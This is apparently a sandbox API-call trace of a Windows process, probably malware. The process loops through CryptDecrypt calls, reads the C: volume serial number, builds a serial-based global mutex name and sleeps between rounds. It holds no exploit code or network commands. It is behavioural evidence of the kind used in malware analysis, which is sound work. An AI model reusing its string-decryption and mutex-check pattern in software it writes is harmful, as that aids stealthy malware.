ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db16c8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0107.322] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16f0 | out: hHeap=0x1db0000) returned 1 [0107.322] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16a0 | out: hHeap=0x1db0000) returned 1 [0107.322] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0107.323] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16c8 | out: hHeap=0x1db0000) returned 1 [0107.323] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db16a0 [0107.323] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29bf60) returned 1 [0107.323] CryptSetKeyParam (hKey=0x29bf60, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0107.323] CryptDecrypt (in: hKey=0x29bf60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16a0, pdwDataLen=0x200fb28 | out: pbData=0x1db16a0, pdwDataLen=0x200fb28) returned 1 [0107.323] CryptDestroyKey (hKey=0x29bf60) returned 1 [0107.323] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db16e8 [0107.323] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x0 [0107.323] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\00019C354B4201") returned 0x22c [0107.323] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x0) returned 0x0 [0107.323] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16a0 | out: hHeap=0x1db0000) returned 1 [0107.323] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16e8 | out: hHeap=0x1db0000) returned 1 [0107.323] ReleaseMutex (hMutex=0x22c) returned 1 [0107.323] CloseHandle (hObject=0x22c) returned 1 [0107.323] Sleep (dwMilliseconds=0x3e8) [0108.508] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db16a0 [0108.508] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29bf60) returned 1 [0108.509] CryptSetKeyParam (hKey=0x29bf60, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0108.509] CryptDecrypt (in: hKey=0x29bf60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16a0, pdwDataLen=0x200faf4 | out: pbData=0x1db16a0, pdwDataLen=0x200faf4) returned 1 [0108.509] CryptDestroyKey (hKey=0x29bf60) returned 1 [0108.509] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db16c8 [0108.509] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db16f0 [0108.509] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db54e8 [0108.509] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29bf60) returned 1 [0108.509] CryptSetKeyParam (hKey=0x29bf60, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0108.509] CryptDecrypt (in: hKey=0x29bf60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db54e8, pdwDataLen=0x200facc | out: pbData=0x1db54e8, pdwDataLen=0x200facc) returned 1 [0108.509] CryptDestroyKey (hKey=0x29bf60) returned 1 [0108.509] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0108.509] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db16c8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0108.509] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16f0 | out: hHeap=0x1db0000) returned 1 [0108.509] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16a0 | out: hHeap=0x1db0000) returned 1 [0108.509] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0108.509] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16c8 | out: hHeap=0x1db0000) returned 1 [0108.509] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db16a0 [0108.509] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29bf60) returned 1 [0108.509] CryptSetKeyParam (hKey=0x29bf60, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0108.509] CryptDecrypt (in: hKey=0x29bf60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16a0, pdwDataLen=0x200fb28 | out: pbData=0x1db16a0, pdwDataLen=0x200fb28) returned 1 [0108.509] CryptDestroyKey (hKey=0x29bf60) returned 1 [0108.509] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db16e8 [0108.509] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x0 [0108.509] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\00019C354B4201") returned 0x22c [0108.509] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x0) returned 0x0 [0108.510] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16a0 | out: hHeap=0x1db0000) returned 1 [0108.510] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16e8 | out: hHeap=0x1db0000) returned 1 [0108.510] ReleaseMutex (hMutex=0x22c) returned 1 [0108.510] CloseHandle (hObject=0x22c) returned 1 [0108.510] Sleep (dwMilliseconds=0x3e8) [0110.008] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db5778 [0110.009] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29bfe0) returned 1 [0110.009] CryptSetKeyParam (hKey=0x29bfe0, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0110.009] CryptDecrypt (in: hKey=0x29bfe0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5778, pdwDataLen=0x200faf4 | out: pbData=0x1db5778, pdwDataLen=0x200faf4) returned 1 [0110.009] CryptDestroyKey (hKey=0x29bfe0) returned 1 [0110.009] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db54e8 [0110.009] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db5510 [0110.009] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0110.009] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29bfe0) returned 1 [0110.009] CryptSetKeyParam (hKey=0x29bfe0, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0110.009] CryptDecrypt (in: hKey=0x29bfe0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0110.009] CryptDestroyKey (hKey=0x29bfe0) returned 1 [0110.009] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0110.009] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db54e8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0110.009] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5510 | out: hHeap=0x1db0000) returned 1 [0110.009] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5778 | out: hHeap=0x1db0000) returned 1 [0110.009] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0110.009] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0110.009] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db54e8 [0110.009] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29bfe0) returned 1 [0110.009] CryptSetKeyParam (hKey=0x29bfe0, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0110.009] CryptDecrypt (in: hKey=0x29bfe0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db54e8, pdwDataLen=0x200fb28 | out: pbData=0x1db54e8, pdwDataLen=0x200fb28) returned 1 [0110.009] CryptDestroyKey (hKey=0x29bfe0) returned 1 [0110.009] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db16d0 [0110.009] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x0 [0110.010] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\00019C354B4201") returned 0x24c [0110.010] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x0 [0110.010] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0110.010] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0110.010] ReleaseMutex (hMutex=0x24c) returned 1 [0110.010] CloseHandle (hObject=0x24c) returned 1 [0110.010] Sleep (dwMilliseconds=0x3e8) [0111.134] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db1718 [0111.134] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29bfe0) returned 1 [0111.134] CryptSetKeyParam (hKey=0x29bfe0, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0111.135] CryptDecrypt (in: hKey=0x29bfe0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db1718, pdwDataLen=0x200faf4 | out: pbData=0x1db1718, pdwDataLen=0x200faf4) returned 1 [0111.135] CryptDestroyKey (hKey=0x29bfe0) returned 1 [0111.135] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db1740 [0111.135] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db5850 [0111.135] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db5878 [0111.135] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29bfe0) returned 1 [0111.135] CryptSetKeyParam (hKey=0x29bfe0, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0111.135] CryptDecrypt (in: hKey=0x29bfe0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5878, pdwDataLen=0x200facc | out: pbData=0x1db5878, pdwDataLen=0x200facc) returned 1 [0111.135] CryptDestroyKey (hKey=0x29bfe0) returned 1 [0111.135] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5878 | out: hHeap=0x1db0000) returned 1 [0111.135] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db1740, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0111.135] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5850 | out: hHeap=0x1db0000) returned 1 [0111.135] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db1718 | out: hHeap=0x1db0000) returned 1 [0111.135] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0111.135] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db1740 | out: hHeap=0x1db0000) returned 1 [0111.135] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db1718 [0111.135] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29bfe0) returned 1 [0111.135] CryptSetKeyParam (hKey=0x29bfe0, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0111.135] CryptDecrypt (in: hKey=0x29bfe0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db1718, pdwDataLen=0x200fb28 | out: pbData=0x1db1718, pdwDataLen=0x200fb28) returned 1 [0111.135] CryptDestroyKey (hKey=0x29bfe0) returned 1 [0111.136] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db5850 [0111.136] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x0 [0111.136] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\00019C354B4201") returned 0x260 [0111.136] WaitForSingleObject (hHandle=0x260, dwMilliseconds=0x0) returned 0x0 [0111.136] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db1718 | out: hHeap=0x1db0000) returned 1 [0111.136] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5850 | out: hHeap=0x1db0000) returned 1 [0111.136] ReleaseMutex (hMutex=0x260) returned 1 [0111.136] CloseHandle (hObject=0x260) returned 1 [0111.136] Sleep (dwMilliseconds=0x3e8) [0112.220] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db58d0 [0112.220] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c260) returned 1 [0112.220] CryptSetKeyParam (hKey=0x29c260, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0112.220] CryptDecrypt (in: hKey=0x29c260, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db58d0, pdwDataLen=0x200faf4 | out: pbData=0x1db58d0, pdwDataLen=0x200faf4) returned 1 [0112.220] CryptDestroyKey (hKey=0x29c260) returned 1 [0112.220] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db58f8 [0112.220] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db9a90 [0112.220] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db9ab8 [0112.220] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c260) returned 1 [0112.220] CryptSetKeyParam (hKey=0x29c260, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0112.220] CryptDecrypt (in: hKey=0x29c260, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db9ab8, pdwDataLen=0x200facc | out: pbData=0x1db9ab8, pdwDataLen=0x200facc) returned 1 [0112.220] CryptDestroyKey (hKey=0x29c260) returned 1 [0112.220] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9ab8 | out: hHeap=0x1db0000) returned 1 [0112.220] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db58f8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0112.220] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9a90 | out: hHeap=0x1db0000) returned 1 [0112.220] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db58d0 | out: hHeap=0x1db0000) returned 1 [0112.220] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0112.220] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db58f8 | out: hHeap=0x1db0000) returned 1 [0112.220] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db58d0 [0112.220] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c260) returned 1 [0112.220] CryptSetKeyParam (hKey=0x29c260, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0112.220] CryptDecrypt (in: hKey=0x29c260, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db58d0, pdwDataLen=0x200fb28 | out: pbData=0x1db58d0, pdwDataLen=0x200fb28) returned 1 [0112.220] CryptDestroyKey (hKey=0x29c260) returned 1 [0112.220] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db9a90 [0112.220] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x0 [0112.220] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\00019C354B4201") returned 0x2b8 [0112.220] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0x0) returned 0x0 [0112.221] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db58d0 | out: hHeap=0x1db0000) returned 1 [0112.221] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9a90 | out: hHeap=0x1db0000) returned 1 [0112.221] ReleaseMutex (hMutex=0x2b8) returned 1 [0112.221] CloseHandle (hObject=0x2b8) returned 1 [0112.221] Sleep (dwMilliseconds=0x3e8) [0113.572] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db9af0 [0113.572] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c220) returned 1 [0113.572] CryptSetKeyParam (hKey=0x29c220, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0113.572] CryptDecrypt (in: hKey=0x29c220, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db9af0, pdwDataLen=0x200faf4 | out: pbData=0x1db9af0, pdwDataLen=0x200faf4) returned 1 [0113.572] CryptDestroyKey (hKey=0x29c220) returned 1 [0113.572] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db9b18 [0113.572] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db9b40 [0113.572] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db9b68 [0113.572] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c220) returned 1 [0113.572] CryptSetKeyParam (hKey=0x29c220, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0113.572] CryptDecrypt (in: hKey=0x29c220, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db9b68, pdwDataLen=0x200facc | out: pbData=0x1db9b68, pdwDataLen=0x200facc) returned 1 [0113.572] CryptDestroyKey (hKey=0x29c220) returned 1 [0113.572] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9b68 | out: hHeap=0x1db0000) returned 1 [0113.572] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db9b18, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0113.572] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9b40 | out: hHeap=0x1db0000) returned 1 [0113.572] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9af0 | out: hHeap=0x1db0000) returned 1 [0113.572] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0113.573] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9b18 | out: hHeap=0x1db0000) returned 1 [0113.573] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db9af0 [0113.573] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c220) returned 1 [0113.573] CryptSetKeyParam (hKey=0x29c220, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0113.573] CryptDecrypt (in: hKey=0x29c220, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db9af0, pdwDataLen=0x200fb28 | out: pbData=0x1db9af0, pdwDataLen=0x200fb28) returned 1 [0113.573] CryptDestroyKey (hKey=0x29c220) returned 1 [0113.573] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db9b38 [0113.573] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x0 [0113.573] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\00019C354B4201") returned 0x2a8 [0113.573] WaitForSingleObject (hHandle=0x2a8, dwMilliseconds=0x0) returned 0x0 [0113.573] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9af0 | out: hHeap=0x1db0000) returned 1 [0113.573] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9b38 | out: hHeap=0x1db0000) returned 1 [0113.573] ReleaseMutex (hMutex=0x2a8) returned 1 [0113.573] CloseHandle (hObject=0x2a8) returned 1 [0113.573] Sleep (dwMilliseconds=0x3e8) [0114.688] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db9af0 [0114.688] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c220) returned 1 [0114.688] CryptSetKeyParam (hKey=0x29c220, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0114.688] CryptDecrypt (in: hKey=0x29c220, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db9af0, pdwDataLen=0x200faf4 | out: pbData=0x1db9af0, pdwDataLen=0x200faf4) returned 1 [0114.688] CryptDestroyKey (hKey=0x29c220) returned 1 [0114.688] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db9b18 [0114.688] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db9b40 [0114.688] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db9b68 [0114.688] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c220) returned 1 [0114.688] CryptSetKeyParam (hKey=0x29c220, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0114.688] CryptDecrypt (in: hKey=0x29c220, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db9b68, pdwDataLen=0x200facc | out: pbData=0x1db9b68, pdwDataLen=0x200facc) returned 1 [0114.688] CryptDestroyKey (hKey=0x29c220) returned 1 [0114.688] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9b68 | out: hHeap=0x1db0000) returned 1 [0114.688] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db9b18, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0114.688] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9b40 | out: hHeap=0x1db0000) returned 1 [0114.688] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9af0 | out: hHeap=0x1db0000) returned 1 [0114.688] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0114.689] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9b18 | out: hHeap=0x1db0000) returned 1 [0114.689] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db9af0 [0114.689] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c220) returned 1 [0114.689] CryptSetKeyParam (hKey=0x29c220, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0114.689] CryptDecrypt (in: hKey=0x29c220, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db9af0, pdwDataLen=0x200fb28 | out: pbData=0x1db9af0, pdwDataLen=0x200fb28) returned 1 [0114.689] CryptDestroyKey (hKey=0x29c220) returned 1 [0114.689] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db9b38 [0114.689] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x0 [0114.689] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\00019C354B4201") returned 0x2ac [0114.689] WaitForSingleObject (hHandle=0x2ac, dwMilliseconds=0x0) returned 0x0 [0114.689] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9af0 | out: hHeap=0x1db0000) returned 1 [0114.689] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9b38 | out: hHeap=0x1db0000) returned 1 [0114.689] ReleaseMutex (hMutex=0x2ac) returned 1 [0114.689] CloseHandle (hObject=0x2ac) returned 